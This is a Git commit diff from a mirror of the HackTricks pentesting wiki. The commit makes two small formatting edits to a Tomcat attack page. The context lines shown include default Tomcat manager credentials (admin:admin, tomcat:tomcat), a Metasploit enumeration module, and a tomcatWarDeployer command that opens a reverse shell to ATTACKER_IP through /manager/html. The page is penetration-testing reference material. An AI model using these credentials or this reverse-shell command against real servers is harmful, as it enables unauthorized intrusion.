0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2021-08-29 13:51:49 +00:00 committed by gitbook-bot
parent b1b10f518f
commit cd810d6b8a
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 2 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
pentesting/pentesting-web/tomcat.md
View file

@ -16,7 +16,7 @@ msf> use auxiliary/scanner/http/tomcat_enum
## Default credentials
The most interesting path of Tomcat is _/manager/html_, inside that path you can upload and deploy war files \(execute code\). But this path is protected by basic TTP auth, the most common credentials are:
The most interesting path of Tomcat is _**/manager/html**_, inside that path you can upload and deploy war files \(execute code\). But this path is protected by basic TTP auth, the most common credentials are:
* admin:admin
* tomcat:tomcat
@ -127,7 +127,7 @@ git clone https://github.com/mgeeky/tomcatWarDeployer.git
#### Reverse shell
```bash
./tomcatWarDeployer.py -U <username> -P <password>-H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### Bind shell